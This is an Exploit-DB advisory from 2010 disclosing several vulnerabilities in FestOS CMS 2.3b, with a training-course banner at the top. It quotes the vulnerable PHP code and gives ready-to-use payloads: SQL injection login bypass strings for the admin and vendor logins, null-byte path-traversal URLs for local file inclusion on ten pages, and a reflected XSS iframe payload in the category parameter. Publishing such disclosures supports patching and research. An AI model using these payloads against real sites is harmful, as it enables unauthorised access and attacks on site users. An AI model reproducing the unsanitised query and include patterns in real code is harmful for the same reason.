festos CMS 2.3b - Multiple Vulnerabilities

EDB-ID:

14948


Author:

Abysssec

Type:

webapps


Platform:

PHP

Date:

2010-09-09


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <  Day 9 (0day)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

 http://www.exploit-db.com/moaub-9-festos-cms-2-3b-multiple-remote-vulnerabilities/
 '''
 
Title  : FestOS CMS 2.3b Multiple Remote Vulnerabilities
Affected Version : <=2.3b
Vendor  Site   : http://festengine.org/
 
Discovery : abysssec.com
 
 
Description :
 
This CMS have many critical vulnerability that we refere to some of those here:
 
 
Vulnerabilites :
 
1- SQL Injection
 
Vulnerability :

1.1- in admin/do_login.php line 17:

// Process the login
$query = "SELECT userid, roleID, username FROM ".$config['dbprefix']."users WHERE LCASE(username) = '".strtolower($_POST['username'])."' and password ='".md5($_POST['password'])."'";
$res = $festos->query($query);

poc: in admin.php page: 
username: admin' or '1'='1 	
password: admin' or '1'='1
 
1.2- in festos_z_dologin.php:
$query = "SELECT vendorID FROM ".$config['dbprefix']."vendors WHERE LCASE(email) = '".strtolower($_POST['email'])."' and password ='".$_POST['password']."'";

poc: in applications.php page:
email: anything
pass: a' or 1=1/*

2- Local File Inclusion (lfi):

Vulnerability in index.php:

line 41:

if(isset($_GET['theme']) && !empty($_GET['theme']) && file_exists($config['ABSOLUTE_FILE_PATH'].'themes/'.$_GET['theme'])) {
...
require_once($themepath.'/includes/header.php');

poc:
http://localhost/festos/index.php?theme=../admin/css/admin.css%00
http://localhost/festos/artists.php?theme=../admin/css/admin.css%00
http://localhost/festos/contacts.php?theme=../admin/css/admin.css%00
http://localhost/festos/applications.php?theme=../admin/css/admin.css%00
http://localhost/festos/entertainers.php?theme=../admin/css/admin.css%00
http://localhost/festos/exhibitors.php?theme=../admin/css/admin.css%00
http://localhost/festos/foodvendors.php?theme=../admin/css/admin.css%00
http://localhost/festos/performanceschedule.php?theme=../admin/css/admin.css%00
http://localhost/festos/sponsors.php?theme=../admin/css/admin.css%00
http://localhost/festos/winners.php?theme=../admin/css/admin.css%00
 
3- Cross Site Scripting:

in foodvendors.php, festos_foodvendors.php page has been included. 

lines 31-36.

switch($switcher) {
	case 'details':
		if(!isset($_GET['vendorID']) || ctype_digit($_GET['vendorID'])===FALSE || $_GET['vendorID'] == '') {
			$template = 'foodvendors_nonespecified.tpl';
			break;
		}
and in line 74:
$tpl->set('vType', $_GET['category']);

and foodvendors_nonespecified.tpl

line 123:

<p>Back to the list of <a href="<?php echo $_SERVER['PHP_SELF'];?>?view=list&vTypeID=<?php echo $vTypeID;?>" title="<?php echo $vType;?> Category">exhibitors in the <?php echo $vType;?> category</a>.</p>

the category parameter is vulnerable to xss:
poc:
http://localhost/festos/foodvendors.php?view=details&vendorID=4&category=%3Ciframe%20src=javascript:alert%28%22XSS%22%29;&vTypeID=28